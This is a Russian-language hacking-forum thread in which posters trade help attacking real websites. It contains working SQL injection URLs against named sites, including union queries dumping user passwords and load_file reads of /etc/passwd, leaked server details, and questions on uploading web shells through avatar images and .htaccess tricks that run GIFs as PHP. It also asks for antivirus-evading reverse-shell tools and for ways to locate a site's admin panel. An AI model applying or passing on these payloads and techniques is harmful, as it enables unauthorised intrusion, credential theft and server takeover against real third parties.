да обычная логинилка в админку форума, только еще поле куда личный код админа надо вводить помимо пароля PHP: <form action='http://forum.site.ru/admin.php?adsess=' method='post' name='theAdminForm' > <input type='hidden' name='adsess' value=''> <input type='hidden' name='login' value='yes'><div class='tableborder'> <div class='maintitle'>Требование авторизации</div> <table width='100%' cellspacing='0' cellpadding='5' align='center' border='0'><tr> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваше имя:</td> <td class='tdrow2' width='60%' valign='middle'><input type='text' style='width:100%' name='username' value='Libra'></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш пароль:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='password' value=''></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш личный код:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='ppassword' value=''></td> </tr> <tr><td align='center' class='pformstrip' colspan='2' ><input type='submit' value='Войти' id='button' accesskey='s'></td></tr> </form></table></div><br />
да уже сам вкурил что к чему...тот же форум почитал...читалка не робит , так что шансы на заливку шелла урезались очень сильно.Но в любом случае спасибо большое з аоказанную помосйь и потерянное время.
Хочу применить всем ивестную дыру в vbseo 3.3.2 (инклуд). Но столкнулся с проблемов. Когда хочу поставить картинку с шеллом себе на аватар пишет: хотя и размеры правильные и все остальное. Как решить эту проблему?
Через что можно сделать back connect кроме netcat. Net cat не подходит, т.к. палится антивирусом. Читал что можно через netwox но так и не разобрался как. Знающие подскажите!
Code: http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5 Blind MYsql system information: ---------------------------------- @@basedir: / @@tmpdir: /tmp/ database(): nnovia3_osc1 @@version_compile_os: pc-linux-gnu version(): 5.0.89-community @@datadir: /var/lib/mysql/ user(): nnovia3_osc1@localhost
2 Pashkela thanks. Я ввожу твою строку http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5 и на экране ничего не выводится. или эта конструкция работает только с тулзой?
может кто поможет и подскажет как раскрутить.... получен доступ к password а к login нет http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+aes_decrypt(aes_encrypt(group_concat(pwd,0x3a+SEPARATOR+0x0b),0x71),0x71),2,3,4,5+from+users-- решил использовать load_file('/etc/passwd') http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+load_file(0x2f6574632f706173737764),2,3,4,5+from+users-- получил права на чтение файлов /home/ http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid=196&uid=-167+and+1=2+union+all+select+load_file(0x2f686f6d652f),2,3,4,5+from+users-- а вот в дальнейших деррикториях я запутался
Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/* Выплевовает ошибку Как обойти? Я новичек, посоветуйте плз.
budden пробовал закрывать скобки уже, не катит.and 1=0 тут не причём, тем более если &country=-1, можно просто 99999999 или +limit+1,1 (так тоже принтабельные можно вывести) но не в этом случае. Т.к. поля подобрать всё равно не представлется возможным. Подзапросы юзать наверное тоже не выйдет, я просто не пойму как обрезать запрос...
Не могу найти админку: http://www.yellowbulletin.com/ MS SQL сканером: security-digger.org не получается.
есть возможность залить htaccess через админ-панель. как сделать так, чтобы сервер воспринимал gif-картинки как php-скрипты ?
